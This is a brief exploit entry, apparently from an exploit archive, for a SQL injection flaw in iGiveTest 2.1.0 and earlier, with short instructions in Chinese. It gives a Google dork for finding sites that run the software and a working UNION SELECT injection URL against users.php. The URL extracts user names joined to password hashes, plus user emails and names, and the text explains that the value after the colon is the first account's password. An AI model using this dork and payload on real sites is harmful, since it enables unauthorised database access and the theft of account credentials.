# Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
Google Dork: "Powered by iGiveTest"

随便注册个号

http://localhost/[PATH]/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1

iGiveTest 2.1.0 注入漏洞

第一个账号 冒号后面的就是密码了